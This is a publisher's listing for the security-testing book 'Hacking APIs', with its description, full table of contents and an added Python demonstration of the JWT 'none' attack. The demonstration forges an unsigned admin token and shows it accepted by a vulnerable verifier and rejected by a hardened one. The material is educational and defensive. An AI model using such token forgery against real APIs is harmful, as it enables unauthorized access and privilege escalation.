Hacking APIs

Book description

An Application Programming Interface (API) is a software connection that allows applications to communicate and share services. Hacking APIs will teach you how to test web APIs for security vulnerabilities. You’ll learn how the common API types, REST, SOAP, and GraphQL, work in the wild. Then you’ll set up a streamlined API testing lab and perform common attacks, like those targeting an API’s authentication mechanisms, and the injection vulnerabilities commonly found in web applications. In the book’s guided labs, which target intentionally vulnerable APIs, you’ll practice:

• Enumerating API users and endpoints using fuzzing techniques
• Using Postman to discover an excessive data exposure vulnerability
• Performing a JSON Web Token attack against an API authentication process
• Combining multiple API attack techniques to perform a NoSQL injection
• Attacking a GraphQL API to uncover a broken object level authorization vulnerability

By the end of the book, you’ll be prepared to uncover those high-payout API bugs that other hackers aren’t finding, and improve the security of applications on the web.
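The third lab topic above (a JSON Web Token attack against API authentication) corresponds to the "None Attack" in Chapter 8. As an added illustration, not code from the book or its labs, the following Python shows what that attack looks like end to end: decoding a JWT without verifying it, re-issuing it with `alg: none`, an empty signature and an elevated claim, and then feeding it to two verifiers, one that trusts the token's own `alg` header (vulnerable) and one that pins the algorithm server-side (hardened). The secret, the claim names and the function names are all constructed for this example and are not from the book. Only the standard library is used, so it runs offline.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Constructed demo secret; not a value from the book or any real system.
SECRET = b"demo-secret-not-from-the-book"


def b64url_encode(data: bytes) -> str:
    """JWT-style base64url without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Re-add the padding JWTs strip before decoding."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


def _signing_input(header: dict, payload: dict) -> str:
    """header.payload, both compact-JSON and base64url encoded."""
    return (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a legitimate HS256 token (stands in for the API's login endpoint)."""
    signing_input = _signing_input({"alg": "HS256", "typ": "JWT"}, payload)
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """What a tester does first: read header and claims without any signature check."""
    h, p, _ = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def forge_none_token(token: str, **claim_overrides) -> str:
    """The none attack: keep the claims, swap alg to none, drop the signature."""
    _, payload = decode_unverified(token)
    payload.update(claim_overrides)
    return _signing_input({"alg": "none", "typ": "JWT"}, payload) + "."


def verify_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """Vulnerable: honours whatever alg the attacker wrote into the header."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))  # no signature check at all
    if header.get("alg") == "HS256":
        expected = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    return None


def verify_hardened(token: str, secret: bytes) -> Optional[dict]:
    """Hardened: the server pins HS256 and rejects any other alg, including none."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    try:
        header = json.loads(b64url_decode(h))
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    legit = sign_hs256({"sub": "alice", "role": "user"}, SECRET)
    forged = forge_none_token(legit, role="admin")
    print("forged token:", forged)
    print("vulnerable verifier accepts:", verify_vulnerable(forged, SECRET))
    print("hardened verifier accepts:", verify_hardened(forged, SECRET))
```

The point the hardened verifier makes is that the fix is not to blocklist the string `none` (case variants such as `None` or `NONE` have defeated such checks in real libraries) but to never read the algorithm from untrusted input at all: the server decides the algorithm and key, and the header is only checked for agreement with that decision.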

Table of contents

  1. Praise for Hacking APIs
  2. Title Page
  3. Copyright
  4. Dedication
  5. About the Author
  6. Foreword
  7. Acknowledgments
  8. Introduction
    1. The Allure of Hacking Web APIs
    2. This Book’s Approach
    3. Hacking the API Restaurant
  9. Part I: How Web API Security Works
    1. Chapter 0: Preparing for Your Security Tests
      1. Receiving Authorization
      2. Threat Modeling an API Test
      3. Which API Features You Should Test
        1. API Authenticated Testing
        2. Web Application Firewalls
        3. Mobile Application Testing
        4. Auditing API Documentation
        5. Rate Limit Testing
      4. Restrictions and Exclusions
        1. Security Testing Cloud APIs
        2. DoS Testing
      5. Reporting and Remediation Testing
      6. A Note on Bug Bounty Scope
      7. Summary
    2. Chapter 1: How Web Applications Work
      1. Web App Basics
        1. The URL
        2. HTTP Requests
        3. HTTP Responses
        4. HTTP Status Codes
        5. HTTP Methods
        6. Stateful and Stateless HTTP
      2. Web Server Databases
        1. SQL
        2. NoSQL
      3. How APIs Fit into the Picture
      4. Summary
    3. Chapter 2: The Anatomy of Web APIs
      1. How Web APIs Work
      2. Standard Web API Types
        1. RESTful APIs
        2. GraphQL
      3. REST API Specifications
      4. API Data Interchange Formats
        1. JSON
        2. XML
        3. YAML
      5. API Authentication
        1. Basic Authentication
        2. API Keys
        3. JSON Web Tokens
        4. HMAC
        5. OAuth 2.0
        6. No Authentication
      6. APIs in Action: Exploring Twitter’s API
      7. Summary
    4. Chapter 3: Common API Vulnerabilities
      1. Information Disclosure
      2. Broken Object Level Authorization
      3. Broken User Authentication
      4. Excessive Data Exposure
      5. Lack of Resources and Rate Limiting
      6. Broken Function Level Authorization
      7. Mass Assignment
      8. Security Misconfigurations
      9. Injections
      10. Improper Assets Management
      11. Business Logic Vulnerabilities
      12. Summary
  10. Part II: Building an API Testing Lab
    1. Chapter 4: Your API Hacking System
      1. Kali Linux
      2. Analyzing Web Apps with DevTools
      3. Capturing and Modifying Requests with Burp Suite
        1. Setting Up FoxyProxy
        2. Adding the Burp Suite Certificate
        3. Navigating Burp Suite
        4. Intercepting Traffic
        5. Altering Requests with Intruder
      4. Crafting API Requests in Postman, an API Browser
        1. The Request Builder
        2. Environments
        3. Collections
        4. The Collection Runner
        5. Code Snippets
        6. The Tests Panel
      5. Configuring Postman to Work with Burp Suite
      6. Supplemental Tools
        1. Performing Reconnaissance with OWASP Amass
        2. Discovering API Endpoints with Kiterunner
        3. Scanning for Vulnerabilities with Nikto
        4. Scanning for Vulnerabilities with OWASP ZAP
        5. Fuzzing with Wfuzz
        6. Discovering HTTP Parameters with Arjun
      7. Summary
      8. Lab #1: Enumerating the User Accounts in a REST API
    2. Chapter 5: Setting Up Vulnerable API Targets
      1. Creating a Linux Host
      2. Installing Docker and Docker Compose
      3. Installing Vulnerable Applications
        1. The completely ridiculous API (crAPI)
        2. OWASP DevSlop’s Pixi
        3. OWASP Juice Shop
        4. Damn Vulnerable GraphQL Application
      4. Adding Other Vulnerable Apps
      5. Hacking APIs on TryHackMe and HackTheBox
      6. Summary
      7. Lab #2: Finding Your Vulnerable APIs
  11. Part III: Attacking APIs
    1. Chapter 6: Discovery
      1. Passive Recon
        1. The Passive Recon Process
        2. Google Hacking
        3. ProgrammableWeb’s API Search Directory
        4. Shodan
        5. OWASP Amass
        6. Exposed Information on GitHub
      2. Active Recon
        1. The Active Recon Process
        2. Baseline Scanning with Nmap
        3. Finding Hidden Paths in Robots.txt
        4. Finding Sensitive Information with Chrome DevTools
        5. Validating APIs with Burp Suite
        6. Crawling URIs with OWASP ZAP
        7. Brute-Forcing URIs with Gobuster
        8. Discovering API Content with Kiterunner
      3. Summary
      4. Lab #3: Performing Active Recon for a Black Box Test
    2. Chapter 7: Endpoint Analysis
      1. Finding Request Information
        1. Finding Information in Documentation
        2. Importing API Specifications
        3. Reverse Engineering APIs
      2. Adding API Authentication Requirements to Postman
      3. Analyzing Functionality
        1. Testing Intended Use
        2. Performing Privileged Actions
        3. Analyzing API Responses
      4. Finding Information Disclosures
      5. Finding Security Misconfigurations
        1. Verbose Errors
        2. Poor Transit Encryption
        3. Problematic Configurations
      6. Finding Excessive Data Exposures
      7. Finding Business Logic Flaws
      8. Summary
      9. Lab #4: Building a crAPI Collection and Discovering Excessive Data Exposure
    3. Chapter 8: Attacking Authentication
      1. Classic Authentication Attacks
        1. Password Brute-Force Attacks
        2. Password Reset and Multifactor Authentication Brute-Force Attacks
        3. Password Spraying
        4. Including Base64 Authentication in Brute-Force Attacks
      2. Forging Tokens
        1. Manual Load Analysis
        2. Live Token Capture Analysis
        3. Brute-Forcing Predictable Tokens
      3. JSON Web Token Abuse
        1. Recognizing and Analyzing JWTs
        2. The None Attack
        3. The Algorithm Switch Attack
        4. The JWT Crack Attack
      4. Summary
      5. Lab #5: Cracking a crAPI JWT Signature
    4. Chapter 9: Fuzzing
      1. Effective Fuzzing
        1. Choosing Fuzzing Payloads
        2. Detecting Anomalies
      2. Fuzzing Wide and Deep
        1. Fuzzing Wide with Postman
        2. Fuzzing Deep with Burp Suite
        3. Fuzzing Deep with Wfuzz
        4. Fuzzing Wide for Improper Assets Management
      3. Testing Request Methods with Wfuzz
      4. Fuzzing “Deeper” to Bypass Input Sanitization
      5. Fuzzing for Directory Traversal
      6. Summary
      7. Lab #6: Fuzzing for Improper Assets Management Vulnerabilities
    5. Chapter 10: Exploiting Authorization
      1. Finding BOLAs
        1. Locating Resource IDs
        2. A-B Testing for BOLA
        3. Side-Channel BOLA
      2. Finding BFLAs
        1. A-B-A Testing for BFLA
        2. Testing for BFLA in Postman
      3. Authorization Hacking Tips
        1. Postman’s Collection Variables
        2. Burp Suite Match and Replace
      4. Summary
      5. Lab #7: Finding Another User’s Vehicle Location
    6. Chapter 11: Mass Assignment
      1. Finding Mass Assignment Targets
        1. Account Registration
        2. Unauthorized Access to Organizations
      2. Finding Mass Assignment Variables
        1. Finding Variables in Documentation
        2. Fuzzing Unknown Variables
        3. Blind Mass Assignment Attacks
      3. Automating Mass Assignment Attacks with Arjun and Burp Suite Intruder
      4. Combining BFLA and Mass Assignment
      5. Summary
      6. Lab #8: Changing the Price of Items in an Online Store
    7. Chapter 12: Injection
      1. Discovering Injection Vulnerabilities
      2. Cross-Site Scripting (XSS)
      3. Cross-API Scripting (XAS)
      4. SQL Injection
        1. Manually Submitting Metacharacters
        2. SQLmap
      5. NoSQL Injection
      6. Operating System Command Injection
      7. Summary
      8. Lab #9: Faking Coupons Using NoSQL Injection
  12. Part IV: Real-World API Hacking
    1. Chapter 13: Applying Evasive Techniques and Rate Limit Testing
      1. Evading API Security Controls
        1. How Security Controls Work
        2. API Security Control Detection
        3. Using Burner Accounts
        4. Evasive Techniques
        5. Automating Evasion with Burp Suite
        6. Automating Evasion with Wfuzz
      2. Testing Rate Limits
        1. A Note on Lax Rate Limits
        2. Path Bypass
        3. Origin Header Spoofing
        4. Rotating IP Addresses in Burp Suite
      3. Summary
    2. Chapter 14: Attacking GraphQL
      1. GraphQL Requests and IDEs
      2. Active Reconnaissance
        1. Scanning
        2. Viewing DVGA in a Browser
        3. Using DevTools
      3. Reverse Engineering the GraphQL API
        1. Directory Brute-Forcing for the GraphQL Endpoint
        2. Cookie Tampering to Enable the GraphiQL IDE
        3. Reverse Engineering the GraphQL Requests
        4. Reverse Engineering a GraphQL Collection Using Introspection
      4. GraphQL API Analysis
        1. Crafting Requests Using the GraphiQL Documentation Explorer
        2. Using the InQL Burp Extension
      5. Fuzzing for Command Injection
      6. Summary
    3. Chapter 15: Data Breaches and Bug Bounties
      1. The Breaches
        1. Peloton
        2. USPS Informed Visibility API
        3. T-Mobile API Breach
      2. The Bounties
        1. The Price of Good API Keys
        2. Private API Authorization Issues
        3. Starbucks: The Breach That Never Was
        4. An Instagram GraphQL BOLA
      3. Summary
  13. Conclusion
  14. Appendix A: API Hacking Checklist
  15. Appendix B: Additional Resources
    1. Chapter 0: Preparing for Your Security Tests
    2. Chapter 1: How Web Applications Work
    3. Chapter 2: The Anatomy of Web APIs
    4. Chapter 3: Common API Vulnerabilities
    5. Chapter 4: Your API Hacking System
    6. Chapter 5: Setting Up Vulnerable API Targets
    7. Chapter 6: Discovery
    8. Chapter 7: Endpoint Analysis
    9. Chapter 8: Attacking Authentication
    10. Chapter 9: Fuzzing
    11. Chapter 10: Exploiting Authorization
    12. Chapter 11: Mass Assignment
    13. Chapter 12: Injection
    14. Chapter 13: Applying Evasive Techniques and Rate Limit Testing
    15. Chapter 14: Attacking GraphQL
    16. Chapter 15: Data Breaches and Bug Bounties
  16. Index

Product information

  • Title: Hacking APIs
  • Author(s): Corey Ball
  • Release date: July 2022
  • Publisher(s): No Starch Press
  • ISBN: 9781718502444